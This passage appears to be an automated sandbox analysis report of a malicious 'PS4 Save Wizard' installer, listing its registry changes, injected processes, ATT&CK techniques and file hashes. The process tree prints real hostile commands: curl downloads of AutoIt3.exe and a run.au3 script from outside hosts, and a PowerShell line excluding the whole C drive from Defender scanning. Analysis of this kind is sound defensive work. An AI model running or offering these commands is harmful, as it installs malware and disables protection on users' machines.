Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	PS4SAVEWIZARD.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	PS4SAVEWIZARD.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

msiexec.exepowershell.exepowershell.exe

pid process

816 msiexec.exe
816 msiexec.exe
2608 powershell.exe
2608 powershell.exe
3708 powershell.exe
3708 powershell.exe

pid	process
816	msiexec.exe
816	msiexec.exe
2608	powershell.exe
2608	powershell.exe
3708	powershell.exe
3708	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

msiexec.exemsiexec.exevssvc.exeMusNotification.exe

description	pid	process
Token: SeShutdownPrivilege	2020	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2020	msiexec.exe
Token: SeSecurityPrivilege	816	msiexec.exe
Token: SeCreateTokenPrivilege	2020	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2020	msiexec.exe
Token: SeLockMemoryPrivilege	2020	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2020	msiexec.exe
Token: SeMachineAccountPrivilege	2020	msiexec.exe
Token: SeTcbPrivilege	2020	msiexec.exe
Token: SeSecurityPrivilege	2020	msiexec.exe
Token: SeTakeOwnershipPrivilege	2020	msiexec.exe
Token: SeLoadDriverPrivilege	2020	msiexec.exe
Token: SeSystemProfilePrivilege	2020	msiexec.exe
Token: SeSystemtimePrivilege	2020	msiexec.exe
Token: SeProfSingleProcessPrivilege	2020	msiexec.exe
Token: SeIncBasePriorityPrivilege	2020	msiexec.exe
Token: SeCreatePagefilePrivilege	2020	msiexec.exe
Token: SeCreatePermanentPrivilege	2020	msiexec.exe
Token: SeBackupPrivilege	2020	msiexec.exe
Token: SeRestorePrivilege	2020	msiexec.exe
Token: SeShutdownPrivilege	2020	msiexec.exe
Token: SeDebugPrivilege	2020	msiexec.exe
Token: SeAuditPrivilege	2020	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2020	msiexec.exe
Token: SeChangeNotifyPrivilege	2020	msiexec.exe
Token: SeRemoteShutdownPrivilege	2020	msiexec.exe
Token: SeUndockPrivilege	2020	msiexec.exe
Token: SeSyncAgentPrivilege	2020	msiexec.exe
Token: SeEnableDelegationPrivilege	2020	msiexec.exe
Token: SeManageVolumePrivilege	2020	msiexec.exe
Token: SeImpersonatePrivilege	2020	msiexec.exe
Token: SeCreateGlobalPrivilege	2020	msiexec.exe
Token: SeBackupPrivilege	3404	vssvc.exe
Token: SeRestorePrivilege	3404	vssvc.exe
Token: SeAuditPrivilege	3404	vssvc.exe
Token: SeBackupPrivilege	816	msiexec.exe
Token: SeRestorePrivilege	816	msiexec.exe
Token: SeShutdownPrivilege	1368	MusNotification.exe
Token: SeCreatePagefilePrivilege	1368	MusNotification.exe
Token: SeRestorePrivilege	816	msiexec.exe
Token: SeTakeOwnershipPrivilege	816	msiexec.exe
Token: SeRestorePrivilege	816	msiexec.exe
Token: SeTakeOwnershipPrivilege	816	msiexec.exe
Token: SeRestorePrivilege	816	msiexec.exe
Token: SeTakeOwnershipPrivilege	816	msiexec.exe
Token: SeRestorePrivilege	816	msiexec.exe
Token: SeTakeOwnershipPrivilege	816	msiexec.exe
Token: SeRestorePrivilege	816	msiexec.exe
Token: SeTakeOwnershipPrivilege	816	msiexec.exe
Token: SeRestorePrivilege	816	msiexec.exe
Token: SeTakeOwnershipPrivilege	816	msiexec.exe
Token: SeRestorePrivilege	816	msiexec.exe
Token: SeTakeOwnershipPrivilege	816	msiexec.exe
Token: SeRestorePrivilege	816	msiexec.exe
Token: SeTakeOwnershipPrivilege	816	msiexec.exe
Token: SeRestorePrivilege	816	msiexec.exe
Token: SeTakeOwnershipPrivilege	816	msiexec.exe
Token: SeRestorePrivilege	816	msiexec.exe
Token: SeTakeOwnershipPrivilege	816	msiexec.exe
Token: SeRestorePrivilege	816	msiexec.exe
Token: SeTakeOwnershipPrivilege	816	msiexec.exe
Token: SeRestorePrivilege	816	msiexec.exe
Token: SeTakeOwnershipPrivilege	816	msiexec.exe
Token: SeRestorePrivilege	816	msiexec.exe

Suspicious use of FindShellTrayWindow 9 IoCs

Processes:

msiexec.exeaipackagechainer.exePS4SAVEWIZARD.exeAutoIt3.exe

pid	process
2020	msiexec.exe
2020	msiexec.exe
3756	aipackagechainer.exe
3756	aipackagechainer.exe
2796	PS4SAVEWIZARD.exe
3288	AutoIt3.exe
3288	AutoIt3.exe
3288	AutoIt3.exe
3288	AutoIt3.exe

Suspicious use of SendNotifyMessage 5 IoCs

Processes:

PS4SAVEWIZARD.exeAutoIt3.exe

pid process

2796 PS4SAVEWIZARD.exe
3288 AutoIt3.exe
3288 AutoIt3.exe
3288 AutoIt3.exe
3288 AutoIt3.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

AutoIt3.exe

pid process

372 AutoIt3.exe
372 AutoIt3.exe

pid	process
2796	PS4SAVEWIZARD.exe
3288	AutoIt3.exe
3288	AutoIt3.exe
3288	AutoIt3.exe
3288	AutoIt3.exe

pid	process
372	AutoIt3.exe
372	AutoIt3.exe

Suspicious use of WriteProcessMemory 54 IoCs

Processes:

msiexec.exeaipackagechainer.exePS4SAVEWIZARD.execmd.execmd.execmd.execmd.execmd.execmd.exeAutoIt3.exe

description	pid	process	target process
PID 816 wrote to memory of 2560	816	msiexec.exe	srtasks.exe
PID 816 wrote to memory of 2560	816	msiexec.exe	srtasks.exe
PID 816 wrote to memory of 2808	816	msiexec.exe	MsiExec.exe
PID 816 wrote to memory of 2808	816	msiexec.exe	MsiExec.exe
PID 816 wrote to memory of 2808	816	msiexec.exe	MsiExec.exe
PID 816 wrote to memory of 3756	816	msiexec.exe	aipackagechainer.exe
PID 816 wrote to memory of 3756	816	msiexec.exe	aipackagechainer.exe
PID 816 wrote to memory of 3756	816	msiexec.exe	aipackagechainer.exe
PID 3756 wrote to memory of 2796	3756	aipackagechainer.exe	PS4SAVEWIZARD.exe
PID 3756 wrote to memory of 2796	3756	aipackagechainer.exe	PS4SAVEWIZARD.exe
PID 3756 wrote to memory of 2796	3756	aipackagechainer.exe	PS4SAVEWIZARD.exe
PID 2796 wrote to memory of 2132	2796	PS4SAVEWIZARD.exe	cmd.exe
PID 2796 wrote to memory of 2132	2796	PS4SAVEWIZARD.exe	cmd.exe
PID 2132 wrote to memory of 3164	2132	cmd.exe	curl.exe
PID 2132 wrote to memory of 3164	2132	cmd.exe	curl.exe
PID 2132 wrote to memory of 3588	2132	cmd.exe	clip.exe
PID 2132 wrote to memory of 3588	2132	cmd.exe	clip.exe
PID 2796 wrote to memory of 1844	2796	PS4SAVEWIZARD.exe	cmd.exe
PID 2796 wrote to memory of 1844	2796	PS4SAVEWIZARD.exe	cmd.exe
PID 1844 wrote to memory of 3412	1844	cmd.exe	curl.exe
PID 1844 wrote to memory of 3412	1844	cmd.exe	curl.exe
PID 1844 wrote to memory of 3788	1844	cmd.exe	clip.exe
PID 1844 wrote to memory of 3788	1844	cmd.exe	clip.exe
PID 2796 wrote to memory of 3704	2796	PS4SAVEWIZARD.exe	cmd.exe
PID 2796 wrote to memory of 3704	2796	PS4SAVEWIZARD.exe	cmd.exe
PID 3704 wrote to memory of 3476	3704	cmd.exe	curl.exe
PID 3704 wrote to memory of 3476	3704	cmd.exe	curl.exe
PID 3704 wrote to memory of 1392	3704	cmd.exe	clip.exe
PID 3704 wrote to memory of 1392	3704	cmd.exe	clip.exe
PID 2796 wrote to memory of 736	2796	PS4SAVEWIZARD.exe	cmd.exe
PID 2796 wrote to memory of 736	2796	PS4SAVEWIZARD.exe	cmd.exe
PID 736 wrote to memory of 2496	736	cmd.exe	curl.exe
PID 736 wrote to memory of 2496	736	cmd.exe	curl.exe
PID 736 wrote to memory of 3880	736	cmd.exe	clip.exe
PID 736 wrote to memory of 3880	736	cmd.exe	clip.exe
PID 2796 wrote to memory of 2608	2796	PS4SAVEWIZARD.exe	powershell.exe
PID 2796 wrote to memory of 2608	2796	PS4SAVEWIZARD.exe	powershell.exe
PID 2796 wrote to memory of 2140	2796	PS4SAVEWIZARD.exe	cmd.exe
PID 2796 wrote to memory of 2140	2796	PS4SAVEWIZARD.exe	cmd.exe
PID 2140 wrote to memory of 3892	2140	cmd.exe	cmd.exe
PID 2140 wrote to memory of 3892	2140	cmd.exe	cmd.exe
PID 2140 wrote to memory of 2020	2140	cmd.exe	clip.exe
PID 2140 wrote to memory of 2020	2140	cmd.exe	clip.exe
PID 3892 wrote to memory of 3288	3892	cmd.exe	AutoIt3.exe
PID 3892 wrote to memory of 3288	3892	cmd.exe	AutoIt3.exe
PID 3892 wrote to memory of 3288	3892	cmd.exe	AutoIt3.exe
PID 3288 wrote to memory of 372	3288	AutoIt3.exe	AutoIt3.exe
PID 3288 wrote to memory of 372	3288	AutoIt3.exe	AutoIt3.exe
PID 3288 wrote to memory of 372	3288	AutoIt3.exe	AutoIt3.exe
PID 3288 wrote to memory of 372	3288	AutoIt3.exe	AutoIt3.exe
PID 3288 wrote to memory of 372	3288	AutoIt3.exe	AutoIt3.exe
PID 3756 wrote to memory of 3708	3756	aipackagechainer.exe	powershell.exe
PID 3756 wrote to memory of 3708	3756	aipackagechainer.exe	powershell.exe
PID 3756 wrote to memory of 3708	3756	aipackagechainer.exe	powershell.exe

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\8c6cf25734d89865f9aaa5dea926d6dcb66558ac0493248237c36474b1d3bd0e.msi
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2020

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:816

C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
2⤵
PID:2560

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding DAD3EE74573D7488791138954435E738
2⤵
- Loads dropped DLL
PID:2808

C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\aipackagechainer.exe
"C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\aipackagechainer.exe"
2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3756

C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\PS4SAVEWIZARD\PS4SAVEWIZARD.exe
"C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\PS4SAVEWIZARD\PS4SAVEWIZARD.exe"
3⤵
- Executes dropped EXE
- Drops startup file
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2796

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://cdn.discordapp.com/attachments/531227037579345940/914273423725846578/AutoIt3.exe --output C:\ProgramData\EdgeData\AutoIt3.exe | clip
4⤵
- Suspicious use of WriteProcessMemory
PID:2132

C:\Windows\system32\curl.exe
curl https://cdn.discordapp.com/attachments/531227037579345940/914273423725846578/AutoIt3.exe --output C:\ProgramData\EdgeData\AutoIt3.exe
5⤵
PID:3164

C:\Windows\system32\clip.exe
clip
5⤵
PID:3588

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://cdn.discordapp.com/attachments/531227037579345940/914273423725846578/AutoIt3.exe --output AutoIt3.exe | clip
4⤵
- Suspicious use of WriteProcessMemory
PID:1844

C:\Windows\system32\curl.exe
curl https://cdn.discordapp.com/attachments/531227037579345940/914273423725846578/AutoIt3.exe --output AutoIt3.exe
5⤵
PID:3412

C:\Windows\system32\clip.exe
clip
5⤵
PID:3788

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://sincheats.com/gas/run.au3 --output run.au3 | clip
4⤵
- Suspicious use of WriteProcessMemory
PID:3704

C:\Windows\system32\curl.exe
curl https://sincheats.com/gas/run.au3 --output run.au3
5⤵
PID:3476

C:\Windows\system32\clip.exe
clip
5⤵
PID:1392

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://sincheats.com/gas/run.au3 --output C:\ProgramData\EdgeData\run.au3 | clip
4⤵
- Suspicious use of WriteProcessMemory
PID:736

C:\Windows\system32\curl.exe
curl https://sincheats.com/gas/run.au3 --output C:\ProgramData\EdgeData\run.au3
5⤵
PID:2496

C:\Windows\system32\clip.exe
clip
5⤵
PID:3880

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\
4⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2608

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start AutoIt3.exe run.au3 | clip
4⤵
- Suspicious use of WriteProcessMemory
PID:2140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" start AutoIt3.exe run.au3 "
5⤵
- Suspicious use of WriteProcessMemory
PID:3892

C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\AutoIt3.exe
AutoIt3.exe run.au3
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3288

C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\AutoIt3.exe
"C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\AutoIt3.exe"
7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:372

C:\Windows\system32\clip.exe
clip
5⤵
PID:2020

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_D643.ps1 -paths 'C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard','C:\Users\Admin\AppData\Roaming\SaveWiz inc','C:\Users\Admin\AppData\Roaming\SaveWiz inc' -retry_count 10"
3⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3708

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:3404

C:\Windows\system32\MusNotification.exe
C:\Windows\system32\MusNotification.exe
1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:1368

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
a8e8360d573a4ff072dcc6f09d992c88

SHA1
3446774433ceaf0b400073914facab11b98b6807

SHA256
bf5e284e8f95122bf75ead61c7e2b40f55c96742b05330b5b1cb7915991df13b

SHA512
4ee5167643d82082f57c42616007ef9be57f43f9731921bdf7bca611a914724ad94072d3c8f5b130fa54129e5328ccdebf37ba74339c37deb53e79df5cdf0dbe

Download Submit
C:\Users\Admin\AppData\Local\Temp\AI_D643.ps1
MD5
31e1ff54955cedd19c6e6932f10f7c55

SHA1
0b45e8fc0fb965d2a98ac1be82a3cbbe19fbd0f8

SHA256
4ceb0eb297d9c6b2815b953b584a134838417a3db6691bcfc4d015f537e758fd

SHA512
cb339d3409ec87dd70824d9b5b03d3b8b1ecb45af74090305e1c078daee9dca02fbcd53e014ac410eab8d4aa6177821405e6c138a2efec2940aa645c4d970ce9

Download Submit
C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\AutoIt3.exe
MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\AutoIt3.exe
MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\AutoIt3.exe
MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\PS4SAVEWIZARD\PS4SAVEWIZARD.dll
MD5
897ca0836df7450082a666c3eb54884f

SHA1
993c06e824b158cd2df52283f3b2784b28089d36

SHA256
24748afdd647bcf3be291910d88d8b8b79062fa0af9700d00bfd724af88a77cc

SHA512
647e6881e1b7acc4c53459fe780651d39a1016ef1c59da82cd469768b77f2064da329ed703d0548b12811cd8147e7febd5487d384ce0a967f9242d01cb0584b2

Download Submit
C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\PS4SAVEWIZARD\PS4SAVEWIZARD.exe
MD5
a42fe5f4d4d30da09a31b721bdc006a7

SHA1
b24636539fe1758501ba0f30da92f2c1f24ecf38

SHA256
0fc80fb8e0dbc50e338127f17b0a31f521a6c0a220620e7e71ac71efc0c7cb61

SHA512
d1aeead8f9cfe0ff190b04420e792fd1a75216cfafe624725768a25f8125754de2f20bfb9bb79d6dcd69a72bbb1d2a904f479bdf1faf8acb77536ca29286f2fc

Download Submit
C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\PS4SAVEWIZARD\PS4SAVEWIZARD.exe
MD5
a42fe5f4d4d30da09a31b721bdc006a7

SHA1
b24636539fe1758501ba0f30da92f2c1f24ecf38

SHA256
0fc80fb8e0dbc50e338127f17b0a31f521a6c0a220620e7e71ac71efc0c7cb61

SHA512
d1aeead8f9cfe0ff190b04420e792fd1a75216cfafe624725768a25f8125754de2f20bfb9bb79d6dcd69a72bbb1d2a904f479bdf1faf8acb77536ca29286f2fc

Download Submit
C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\PS4SAVEWIZARD\PS4SAVEWIZARD.exe.manifest
MD5
40d927f29252eb0fbc5e22ad85852605

SHA1
244a4dec6e31f750b131d5e4ab149d904077c405

SHA256
051a061730819ebe2b9fd8e74fb326cc27526893eb78e690dd97d7068996aee7

SHA512
621336201fd15aee2982f48aef77394c5cbef442dfdc4edbd7f71bccf8bce79b5725e824bacace59bdf5c41f55325744de5670d8f3cb81cd04e7a2485942c3f7

Download Submit
C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\aipackagechainer.exe
MD5
3563ae6b46b899129a49428aae61e1d4

SHA1
877868a1cd7799b17ef64c3c8282cd6d4b077cc9

SHA256
b8607c4530a0b895aec9e9c29c64c0f370f446dc2eb7541ce1b331cd915a2529

SHA512
6b95ad08cb74368d9ada95a7b5aab996eaa3b2b034c1354c1d171c8c32c7e491eec9bb33aebdf4ef66d0b6a666a744256443b7e7c339e7cf144167b906180b79

Download Submit
C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\aipackagechainer.ini
MD5
5184e09f08ecc2dbe4d2fd67630d9e4c

SHA1
5dde097a9170e11dce489342a801b39a621aaa8e

SHA256
0363d05c0b31c3df1bee879a40e8d9315608b5263f65c71e59b4e08b27d58373

SHA512
ccc6ccd46266a618760d180677e48187c0f072ba2c0252331fd73bd92999c74c2e66a0b268c8dab797c90fa52850d9c01a9516a72be5c5d9c28b83e4efa6f8f2

Download Submit
C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\file_deleter.ps1
MD5
31e1ff54955cedd19c6e6932f10f7c55

SHA1
0b45e8fc0fb965d2a98ac1be82a3cbbe19fbd0f8

SHA256
4ceb0eb297d9c6b2815b953b584a134838417a3db6691bcfc4d015f537e758fd

SHA512
cb339d3409ec87dd70824d9b5b03d3b8b1ecb45af74090305e1c078daee9dca02fbcd53e014ac410eab8d4aa6177821405e6c138a2efec2940aa645c4d970ce9

Download Submit
C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\run.au3
MD5
8d477c9acd79e3ff56dd24b31a28c096

SHA1
a71ebfa20983903a7f7839e6d9b35e81ff708805

SHA256
0eda4096a4d53f4d0453551c6ea79222f81c0dc7b2985b01db5ef50dbc752ff1

SHA512
97d8b1974ed7b999e758605b1f02dcf6dda36447bad094ba4c442bdd82e3d2a8694d06d2d8d52650a3ef50c1342e8efb7394e6159faf95204dc6fb88509b09da

Download Submit
C:\Windows\Installer\MSI3D7D.tmp
MD5
0981d5c068a9c33f4e8110f81ffbb92e

SHA1
badb871adf6f24aba6923b9b21b211cea2aeca77

SHA256
b3f5e10fb1b7352a6dbbcbb10ed605a8fda24f3f9c31f954835bd5a41eb6ea68

SHA512
59cccdcde1964e61fa63078fde776eee91c462d7d3db308ada02e27e6ce584c41ad1f7970642e02ce331d805215a2cc868fb0512c01accfa70cda52e9329e1d8

Download Submit
C:\Windows\Installer\MSI3D7D.tmp
MD5
0981d5c068a9c33f4e8110f81ffbb92e

SHA1
badb871adf6f24aba6923b9b21b211cea2aeca77

SHA256
b3f5e10fb1b7352a6dbbcbb10ed605a8fda24f3f9c31f954835bd5a41eb6ea68

SHA512
59cccdcde1964e61fa63078fde776eee91c462d7d3db308ada02e27e6ce584c41ad1f7970642e02ce331d805215a2cc868fb0512c01accfa70cda52e9329e1d8

Download Submit
C:\Windows\Installer\MSI40CA.tmp
MD5
0981d5c068a9c33f4e8110f81ffbb92e

SHA1
badb871adf6f24aba6923b9b21b211cea2aeca77

SHA256
b3f5e10fb1b7352a6dbbcbb10ed605a8fda24f3f9c31f954835bd5a41eb6ea68

SHA512
59cccdcde1964e61fa63078fde776eee91c462d7d3db308ada02e27e6ce584c41ad1f7970642e02ce331d805215a2cc868fb0512c01accfa70cda52e9329e1d8

Download Submit
C:\Windows\Installer\MSI40CA.tmp
MD5
0981d5c068a9c33f4e8110f81ffbb92e

SHA1
badb871adf6f24aba6923b9b21b211cea2aeca77

SHA256
